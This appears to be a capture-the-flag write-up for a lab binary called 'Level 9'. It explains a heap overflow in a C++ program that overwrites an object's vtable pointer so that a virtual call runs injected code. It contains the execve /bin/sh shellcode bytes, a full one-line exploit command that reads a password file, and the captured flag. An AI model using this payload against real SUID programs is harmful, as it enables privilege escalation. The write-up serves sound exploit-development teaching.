# Level 9

Binary: 32-bit ELF, SUID bonus0, dynamically linked C++. **NX disabled** (unique on this level).

## Analysis

### Ghidra output

```cpp
class N {
    void *vtable;            // offset 0
    char  annotation[100];   // offset 4
    int   value;             // offset 0x68 (104)
    // total size = 108 = 0x6c

    N(int v) {
        vtable = &N_vtable;
        value  = v;
    }

    void setAnnotation(char *s) {
        memcpy(this + 4, s, strlen(s));   // NO bounds check, overflow possible
    }

    int operator+(N &other);   // virtual
};

int main(int argc, char **argv) {
    if (argc < 2) exit(1);
    N *a = new N(5);
    N *b = new N(6);
    a->setAnnotation(argv[1]);      // overflow a
    (*b->vtable[0])(b, a);          // virtual call through b's vtable
}
```

Two objects allocated back-to-back on the heap. `setAnnotation` writes argv[1] into the annotation with no bounds check, so it can overflow into object b.

## Heap layout

```
(gdb) b *0x08048677
(gdb) r AAAA
(gdb) x/wx $esp+0x14     -> a = 0x0804a008
(gdb) x/wx $esp+0x10     -> b = 0x0804a078
```

Distance: `0x0804a078 - 0x0804a008` = `0x70` = **112 bytes**.

Object is 108 bytes, chunk distance is 112, so only 4 bytes of malloc metadata between objects (glibc "size reuse" trick: in-use chunks extend into the next chunk's prev_size field).

```
a+0   : vtable ptr (a.vtable)
a+4   : start of a.annotation  <- setAnnotation writes here
a+104 : a.value
a+108 : chunk b's size field (malloc metadata)
a+112 : b.vtable ptr  <- we want to overwrite this
```

## The virtual call

```asm
mov    0x10(%esp),%eax      ; eax = b
mov    (%eax),%eax           ; eax = *b = vtable pointer
mov    (%eax),%edx           ; edx = *vtable = first function pointer
call   *%edx                 ; call it
```

Two dereferences. To hijack:
- `*b` must equal some address X.
- `*X` must equal shellcode address.

Both X and the shellcode can live inside the annotation we control.

## Shellcode (45 bytes)

Same Aleph One shellcode used in level2, from Phrack 49 article 14 (1996, https://phrack.org/issues/49/14), also mirrored on https://fr.wikipedia.org/wiki/Shellcode.

```
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
```

It explicitly sets `edx` via `lea edx, [esi+12]` (pointing to a NULL), which matters here because the virtual call leaves `edx` with the shellcode address (non-zero), and execve needs envp=NULL.

## Payload (112 bytes)

```
offset 0-44   : shellcode (45 bytes)
offset 45-99  : padding (55 'A')
offset 100-103: shellcode address = a+4 = 0x0804a00c    (fake vtable entry)
offset 104-107: padding (4 'A', overwrites chunk b size, harmless here)
offset 108-111: pointer to fake entry = a+104 = 0x0804a070  (new b.vtable)
```

Runtime chain after memcpy:

```
eax = *b = 0x0804a070           (our injected vtable pointer)
edx = *(0x0804a070) = 0x0804a00c (our injected "vtable entry")
call 0x0804a00c runs shellcode at a+4
```

NX is off on level9, so code on the heap runs fine.

## Running the exploit

```bash
./level9 "$(python -c 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "A"*55 + "\x0c\xa0\x04\x08AAAA\x70\xa0\x04\x08"')"
```

```
cat /home/user/bonus0/.pass
```

Flag: `f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728`

## Notes

### Why argv and not stdin

`memcpy(this+4, argv[1], strlen(argv[1]))`. argv[1] is a null-terminated command-line arg. Our payload has no internal null bytes, so strlen returns 112 and memcpy writes all 112.

### NX disabled matters

Every other level has NX enabled, which blocks code execution on the stack and heap. Here NX is off, so code on the heap runs. No ROP gadgets needed.

### Remember the structure

Two pointer levels in the virtual call:
- b holds a pointer (vtable)
- vtable[0] holds a function pointer
- that function is called

So the payload needs two addresses: one pointing to a location containing the shellcode address, and that location containing the shellcode address itself. Plant both inside the annotation buffer, then overwrite b.vtable to point to the first one.
